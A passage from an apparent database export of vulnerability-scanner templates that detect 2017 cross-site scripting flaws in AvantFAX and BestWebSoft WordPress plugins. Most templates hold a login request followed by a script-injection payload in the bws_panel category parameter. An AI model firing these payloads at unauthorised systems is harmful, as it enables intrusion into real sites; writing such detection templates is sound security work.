classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18024\n cwe-id: CWE-79\n epss-score: 0.00074\n epss-percentile: 0.30209\n cpe: cpe:2.3:a:avantfax:avantfax:3.3.3:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: avantfax\n product: avantfax\n tags: cve,cve2017,avantfax,hackerone,packetstorm,xss\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username=admin&password=admin&_submit_check=1&jlbqgb7g0x=1\n\n matchers-condition: and\n matchers:\n - type: word\n 
part: body\n words:\n - ''\n - 'AvantFAX'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e15727b0ddf652065861bf22bea1c0e93ae8134932a63f1691a2256adbd1b25602201f24ab36ca2f64094ec81fa3f92890da072058fd9f23c5802569ecd06afcb00c:922c64590222798bb761d5b6d8e72950", "hash": "ec04f43243ec2b3090adf432ff13d9a5", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fda" }, "name": "CVE-2017-18487.yaml", "content": "id: CVE-2017-18487\n\ninfo:\n name: AdPush < 1.44 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The adsense-plugin (aka Google AdSense) plugin before 1.44 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18487\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18487\n - https://wordpress.org/plugins/adsense-plugin/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18487\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:google_adsense_project:google_adsense:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: google_adsense_project\n product: google_adsense\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/adsense-plugin/\"\n tags: cve,cve2017,wordpress,wpscan,wp-plugin,xss,bws-adpush,authenticated,google_adsense_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/adsense-plugin/readme.txt HTTP/1.1\n Host: 
{{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Google AdSense\")'\n condition: and\n# digest: 4a0a00473045022100ac224191317b7f9d5c8305933b2f932fc9c11bbb1d356f807a34412326386f6002201ffc830ad1f53205651cbf36c8e55b45f44beea9ded57833044904fb6736187e:922c64590222798bb761d5b6d8e72950", "hash": "8caf1282fa5b82a33913f9e97e13d7b6", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fdb" }, "name": "CVE-2017-18490.yaml", "content": "id: CVE-2017-18490\n\ninfo:\n name: Contact Form Multi by BestWebSoft < 1.2.1 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The contact-form-multi plugin before 1.2.1 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18490\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18490\n - https://wordpress.org/plugins/contact-form-multi/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18490\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:contact_form_multi:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: contact_form_multi\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/contact-form-multi/\"\n tags: cve,cve2017,wordpress,bws-contact-form,wpscan,wp-plugin,xss,authenticated,contact-form-multi,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - 
|\n GET /wp-content/plugins/contact-form-multi/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Contact Form Multi by\")'\n condition: and\n# digest: 490a00463044022047a86d472b4963557d6bdde6b11f2b646e6313f13a90a273e1fce430e894092102205e15a23b0220c1cbb8df6bccb36fd1346acd96b67121cd1349c4c4016415f034:922c64590222798bb761d5b6d8e72950", "hash": "8712edd2b1a8d2b4f09052d96c0d727c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fdc" }, "name": "CVE-2017-18491.yaml", "content": "id: CVE-2017-18491\n\ninfo:\n name: Contact Form by BestWebSoft < 4.0.6 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The contact-form-plugin plugin before 4.0.6 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18491\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18491\n - https://wordpress.org/plugins/contact-form-plugin/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18491\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:contact_form:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: contact_form\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/contact-form-plugin/\"\n tags: cve,cve2017,wordpress,bws,contact-form,wpscan,wp-plugin,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET 
/wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/contact-form-plugin/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Contact Form by\")'\n condition: and\n# digest: 490a00463044022022aaa77f0654980937b928d490f572e59c3e40755b874d4e7ff6a7168136202b02203fcd59db42dff8780151fd38459c2b921a77502f91ff4c72364ad218117af4d2:922c64590222798bb761d5b6d8e72950", "hash": "3f6cb3f87145a0e406813a42715f1707", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fdd" }, "name": "CVE-2017-18492.yaml", "content": "id: CVE-2017-18492\n\ninfo:\n name: Contact Form to DB by BestWebSoft < 1.5.7 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The contact-form-to-db plugin before 1.5.7 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18492\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18492\n - https://wordpress.org/plugins/contact-form-to-db/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18492\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:contact_form_to_db:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: contact_form_to_db\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/contact-form-to-db/\"\n tags: cve2017,cve,wordpress,wpscan,bws-contact-form,wp-plugin,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 
log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/contact-form-to-db/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Contact Form to DB by\")'\n condition: and\n# digest: 4a0a004730450221009117b9d4328ea3a5d94d9ecd68c3c1402e95a82c3b7f5946adaf2c0210a7dd9302203ec8c8a43e1798ce9f668234b12d6d47f7b08c68abd2f858016c8b168794db62:922c64590222798bb761d5b6d8e72950", "hash": "4449f67a8a71da46a44c63fa6df6dbf4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fde" }, "name": "CVE-2017-18493.yaml", "content": "id: CVE-2017-18493\n\ninfo:\n name: Custom Admin Page by BestWebSoft < 0.1.2 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The custom-admin-page plugin before 0.1.2 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18493\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18493\n - https://wordpress.org/plugins/custom-admin-page/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18493\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:custom_admin_page:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: custom_admin_page\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/custom-admin-page/\"\n tags: cve,cve2017,wordpress,bws-adminpage,wpscan,wp-plugin,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: 
{{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/custom-admin-page/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Custom Admin Page by\")'\n condition: and\n# digest: 4b0a00483046022100a8f985f73aa53f158d7b69dc00405ae8393492e82583cda9393d45d6e09b86df022100f47e60f2df1bbdfee0a7a9497bda25b96739c2c69f49f2d8b587082bc45df3b6:922c64590222798bb761d5b6d8e72950", "hash": "57d5a168f361a8e44b22b42d94b2ed73", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fdf" }, "name": "CVE-2017-18494.yaml", "content": "id: CVE-2017-18494\n\ninfo:\n name: Custom Search by BestWebSoft < 1.36 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The custom-search-plugin plugin before 1.36 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18494\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18494\n - https://wordpress.org/plugins/custom-search-plugin/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18494\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36857\n cpe: cpe:2.3:a:bestwebsoft:custom_search:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: custom_search\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/custom-search-plugin/\"\n tags: 
cve,cve2017,wordpress,bws-custom-search,wpscan,wp-plugin,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/custom-search-plugin/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Custom Search by\")'\n condition: and\n# digest: 4b0a00483046022100f9cc3cc8539a1d411d5a0fc2255808c1742059f86723ee77d65a025201fb801e022100d596c70a28642269afc2cafe1fecf0ff789694b8d7407ac813fd2a6adb176d89:922c64590222798bb761d5b6d8e72950", "hash": "45e6e5f05a023255f8345ac82ee8a2ca", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fe0" }, "name": "CVE-2017-18496.yaml", "content": "id: CVE-2017-18496\n\ninfo:\n name: Htaccess by BestWebSoft < 1.7.6 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The htaccess plugin before 1.7.6 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18496\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18496\n - https://wordpress.org/plugins/htaccess/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18496\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36836\n cpe: cpe:2.3:a:bestwebsoft:htaccess:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: htaccess\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/htaccess/\"\n 
tags: cve,cve2017,wordpress,wpscan,bws-htaccess,wp-plugin,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/htaccess/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Htaccess by\")'\n condition: and\n# digest: 4b0a0048304602210083bbc08d8af961271e098a1736c206c3ef81fc9a67b9886fc1185988a4a8d5310221008313ab9d0915cea1add617dcb62ca6f423209ab3d00216d25b0440fe803c5b40:922c64590222798bb761d5b6d8e72950", "hash": "4bc1d98487e9de6126011ba29e7c02c3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fe1" }, "name": "CVE-2017-18500.yaml", "content": "id: CVE-2017-18500\n\ninfo:\n name: Social Buttons Pack by BestWebSof < 1.1.1 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The social-buttons-pack plugin before 1.1.1 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18500\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18500\n - https://wordpress.org/plugins/social-buttons-pack/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18500\n cwe-id: CWE-79\n epss-score: 0.00231\n epss-percentile: 0.60522\n cpe: cpe:2.3:a:bestwebsoft:social_buttons_pack:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: social_buttons_pack\n framework: wordpress\n publicwww-query: 
\"/wp-content/plugins/social-buttons-pack/\"\n tags: cve2017,cve,wordpress,wpscan,bws-social-buttons,wp-plugin,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/social-buttons-pack/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Social Buttons Pack by\")'\n condition: and\n# digest: 4a0a00473045022100f89fb19d15fb08118427dcbbec861334e2869b19a7f7629f950880a2b1a030a402204c072011a5c2993febfb3b7ebae8ee5904fd3f1ab56497f1dbfcdc2b0383083d:922c64590222798bb761d5b6d8e72950", "hash": "f66122562d3d7c3c5d6be58706b4362b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fe2" }, "name": "CVE-2017-18501.yaml", "content": "id: CVE-2017-18501\n\ninfo:\n name: Social Login by BestWebSoft < 0.2 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The social-login-bws plugin before 0.2 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18501\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18501\n - https://wordpress.org/plugins/social-login-bws/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18501\n cwe-id: CWE-79\n epss-score: 0.00231\n epss-percentile: 0.60522\n cpe: cpe:2.3:a:bestwebsoft:social_login:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: 
social_login\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/social-login-bws/\"\n tags: cve2017,cve,wordpress,wpscan,bws-social-login,wp-plugin,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/social-login-bws/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Social Login by\")'\n condition: and\n# digest: 4a0a00473045022100afda914e7e9726b246e585b8f4faa2ff861c17837ff01ded7c22cbaf1e4ea39e02205a4ecb7f7af6fbd5809cb254f685cee642439232493671b38962a87dfed0b84e:922c64590222798bb761d5b6d8e72950", "hash": "0f3c573141abd8d0963f8fa901ce420c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fe3" }, "name": "CVE-2017-18502.yaml", "content": "id: CVE-2017-18502\n\ninfo:\n name: Subscriber by BestWebSoft < 1.3.5 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The subscriber plugin before 1.3.5 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18502\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18502\n - https://wordpress.org/plugins/subscriber/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18502\n cwe-id: CWE-79\n epss-score: 0.00231\n epss-percentile: 0.61251\n cpe: cpe:2.3:a:bestwebsoft:subscriber:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: 
bestwebsoft\n product: subscriber\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/subscriber/\"\n tags: cve2017,cve,wordpress,wpscan,bws-subscribers,wp-plugin,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/subscriber/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Subscriber by\")'\n condition: and\n# digest: 4a0a0047304502210092c0a8a182713b0379f504577e9c0a88d2b686eb80d7625f27f9f20fc3442e0002207e24abadc4512d14c9a97c97f04f2c3ddf76f1344b4e8a945a2d00c0732a9410:922c64590222798bb761d5b6d8e72950", "hash": "44ee5b43f2d12a035e3e6a1f109cbd31", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fe4" }, "name": "CVE-2017-18505.yaml", "content": "id: CVE-2017-18505\n\ninfo:\n name: BestWebSoft's Twitter < 2.55 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The twitter-plugin plugin before 2.55 for WordPress has XSS.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18505\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18505\n - https://wordpress.org/plugins/twitter-plugin/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18505\n cwe-id: CWE-79\n epss-score: 0.00163\n epss-percentile: 0.51969\n cpe: cpe:2.3:a:bestwebsoft:twitter_button:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: 
bestwebsoft\n product: twitter_button\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/twitter-plugin/\"\n tags: cve,cve2017,wordpress,wpscan,bws-twitter,wp-plugin,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/twitter-plugin/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Twitter Button by\")'\n condition: and\n# digest: 4b0a00483046022100a1c5828cf67da18081cde718eb3df76029916bef83ff06ee5d51264e37751dc10221008c464e7a9ae6f75aabb858462c3a0fd473bfcf2e3940b8611d895617e2fb7d9b:922c64590222798bb761d5b6d8e72950", "hash": "3c2ad1342ea26d450d632dd8ba2d5bec", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fe5" }, "name": "CVE-2017-18516.yaml", "content": "id: CVE-2017-18516\n\ninfo:\n name: LinkedIn by BestWebSoft < 1.0.5 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The bws-linkedin plugin before 1.0.5 for WordPress has multiple XSS issues.\n remediation: Fixed in version 1.0.5\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18516\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18516\n - https://wordpress.org/plugins/bws-linkedin/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18516\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36836\n cpe: cpe:2.3:a:bestwebsoft:linkedin:*:*:*:*:*:wordpress:*:*\n 
metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: linkedin\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/bws-linkedin/\"\n tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-linkedin,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/bws-linkedin/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"LinkedIn by BestWebSoft\")'\n condition: and\n# digest: 4a0a00473045022100a4098e76f7a55d8322e7d021a7eb38813ded4ec6d28cf311172d96b63872272c02204aa37545bb0e8ebbd130f622c72698d7d0305c164a9e707c1c013d6bd1b2e961:922c64590222798bb761d5b6d8e72950", "hash": "f9948b617e47c8208ec0a9a1ca68e8ef", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fe6" }, "name": "CVE-2017-18517.yaml", "content": "id: CVE-2017-18517\n\ninfo:\n name: Pinterest by BestWebSoft < 1.0.5 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The bws-pinterest plugin before 1.0.5 for WordPress has multiple XSS issues.\n remediation: Fixed in version 1.0.5\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18517\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18517\n - https://wordpress.org/plugins/bws-pinterest/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18517\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36836\n cpe: 
